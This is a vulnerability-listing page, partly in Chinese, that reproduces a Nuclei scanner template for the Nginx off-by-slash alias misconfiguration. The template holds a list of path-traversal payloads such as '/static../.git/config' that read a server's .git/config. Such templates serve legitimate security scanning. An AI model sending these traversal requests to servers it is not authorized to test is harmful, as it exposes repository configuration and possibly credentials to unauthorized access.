git-config-nginxoffbyslash: Nginx - Git Configuration Exposure

日期: 2025-08-01 | 影响软件: git-config-nginx | POC: 已公开

漏洞描述

Nginx is vulnerable to git configuration exposure.

PoC代码[已公开]

id: git-config-nginxoffbyslash

info:
  name: Nginx - Git Configuration Exposure
  author: organiccrap
  severity: medium
  description: Nginx is vulnerable to git configuration exposure.
  reference:
    - https://beaglesecurity.com/blog/vulnerability/nginx-off-by-slash-exposes-git-config.html
    - https://twitter.com/Random_Robbie/status/1262676628167110656
    - https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-200
  metadata:
    max-request: 10
  tags: config,exposure,nginx,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - '/static../.git/config'
        - '/js../.git/config'
        - '/images../.git/config'
        - '/img../.git/config'
        - '/css../.git/config'
        - '/assets../.git/config'
        - '/content../.git/config'
        - '/events../.git/config'
        - '/media../.git/config'
        - '/lib../.git/config'

    stop-at-first-match: true
    matchers:
      - type: word
        words:
          - '[core]'
# digest: 490a0046304402205d9348a8d314dbe26c81bf5fcdb57cec6b4bd2064a5df9cba9441cdee67c735c02202e02be98cfd26c47836fdbd825d5ee5ff761b5cfc346a04fca9453e811231d10:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/exposures/configs/git-config-nginxoffbyslash.yaml